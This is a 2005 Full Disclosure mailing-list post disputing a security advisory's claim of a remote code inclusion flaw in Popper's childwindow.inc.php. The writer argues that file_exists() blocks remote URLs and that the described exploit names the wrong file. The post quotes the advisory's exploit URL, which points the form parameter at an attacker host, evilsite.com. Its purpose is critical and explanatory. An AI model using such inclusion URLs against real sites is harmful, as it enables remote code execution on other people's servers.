Full Disclosure mailing list archives
LSS.hr false positives.
From: "b0iler" <b0iler () r00thell org>
Date: Sat, 4 Jun 2005 22:15:26 +0100 (BST)
From your advisory @ http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-06-07:
Popper is vulnerable to remote code inclusion bug in childwindow.inc.php script that can be abused to execute arbitrary code. Vulnerable code in childwindow.inc.php: ----- ... if(file_exists($form.".toolbar.inc.php")) { include($form.".toolbar.inc.php"); } ?>
file_exists() only work on local files, not even with allow_url_fopen on does it work. Even if the file_exists() check was not there your discription of how to exploit it is incorrect:
To exploit this vulnerability, attacker has to put script like test.form.inc.php on www.evilsite.com HTTP server, and call url like this: http://www.vulnsite.com/popper/childwindow.inc.php?form=http://evilsite.com/test
they would need to have the file test.toolbar.inc.php, not test.form.inc.php. It's quite obvious you did not even bother testing this before issuing the advisory. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- LSS.hr false positives. b0iler (Jun 04)